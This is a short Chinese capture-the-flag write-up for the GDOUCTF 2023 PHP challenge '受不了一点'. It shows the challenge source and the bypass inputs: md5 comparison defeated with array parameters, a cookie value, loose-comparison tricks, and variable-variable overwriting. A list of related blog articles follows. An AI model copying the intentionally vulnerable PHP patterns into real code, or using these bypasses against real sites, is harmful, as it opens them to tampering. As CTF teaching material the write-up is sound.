[GDOUCTF 2023]受不了一点

GDOUCTF 2023受不了一点 wp

题目代码:

复制代码
 <?php
error_reporting(0);
header("Content-type:text/html;charset=utf-8");
if(isset($_POST['gdou'])&&isset($_POST['ctf'])){
    $b=$_POST['ctf'];
    $a=$_POST['gdou'];
    if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b)){
        if(isset($_COOKIE['cookie'])){
           if ($_COOKIE['cookie']=='j0k3r'){
               if(isset($_GET['aaa']) && isset($_GET['bbb'])){
                  $aaa=$_GET['aaa'];
                  $bbb=$_GET['bbb'];
                 if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){
                   $give = 'cancanwordflag';
                   $get ='hacker!';
                   if(isset($_GET['flag']) && isset($_POST['flag'])){
                         die($give);
                    }
                   if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
                       die($get);
                    }
                    foreach ($_POST as $key => $value) {
                        $$key = $value;
                   }
                    foreach ($_GET as $key => $value) {
                         $$key = $$value;
                    }
                   echo $flag;
            }else{
                  echo "洗洗睡吧";
                 }
    }else{
        echo "行不行啊细狗";
        }
  }
}
else {
  echo '菜菜';
}
}else{
  echo "就这?";
}
}else{
  echo "别来沾边";
}
?>
别来沾边

第一个判断是 MD5 强比较

直接数组绕过,POST 传参:

复制代码
gdou[]=1&ctf[]=2
复制代码
Cookie: cookie=j0k3r

第三个判断是 PHP 弱比较

GET 传参:

复制代码
?aaa=114514&bbb=114514a

经过第三个判断之后就直接拿到 flag 了:

相关推荐
X7x511 分钟前
PDR模型:构建网络安全的黄金三角
网络安全·网络攻击模型·安全威胁分析·安全架构·pdr模型
terry60012 分钟前
2026携号转网查询接口深度测评:技术指标、接入教程与服务商选型
大数据·人工智能·web安全·信息与通信·数据库架构
这个人需要休息24 分钟前
优惠卷类型漏洞---优惠卷的并发使用
mysql·网络安全·逻辑漏洞·后端架构
爱讲故事的1 小时前
计算机网络第 8 章复习:Network Security 网络安全
网络·计算机网络·web安全
黄金龙PLUS1 小时前
基于ARX结构的新型序列密码算法FlashLight
算法·网络安全·密码学·哈希算法·同态加密
顾凌陵1 小时前
PHP序列化漏洞实战:反序列化攻击的奥秘
安全·网络安全
lcreek16 小时前
SQL 注入实战:DVWA High 完整测试指南
网络安全·sql注入
不灭锦鲤19 小时前
网络安全第120天
安全·web安全
超级无敌zhq19 小时前
后渗透痕迹清理:攻防对抗中的隐身术
网络·数据库·网络安全
打码人的日常分享19 小时前
数据安全,网络安全风险评估报告(Word)
安全·web安全